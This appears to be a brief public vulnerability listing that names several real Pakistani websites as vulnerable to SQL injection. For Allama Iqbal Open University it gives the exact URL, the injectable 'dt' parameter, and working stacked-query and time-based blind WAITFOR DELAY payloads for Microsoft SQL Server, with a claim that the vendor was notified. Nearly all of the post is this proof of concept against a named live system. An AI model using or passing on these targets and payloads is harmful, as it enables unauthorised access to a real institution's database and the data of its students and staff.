www.hu.edu.pk – Sql Vulnerability
July 26, 2016www.ogra.org.pk/ – (Error Based Injection)
July 26, 2016Allama Iqbal Open University
website : http://www.aiou.edu.pk/All_Dept_List.asp?dt=1 (GET)
vuln type : sql injection
submitted by : Waqas Haider
Poc :
Parameter: dt (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dt=1;WAITFOR DELAY '0:0:5'–
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dt=1 WAITFOR DELAY '0:0:5'
Notification : Vendor Notified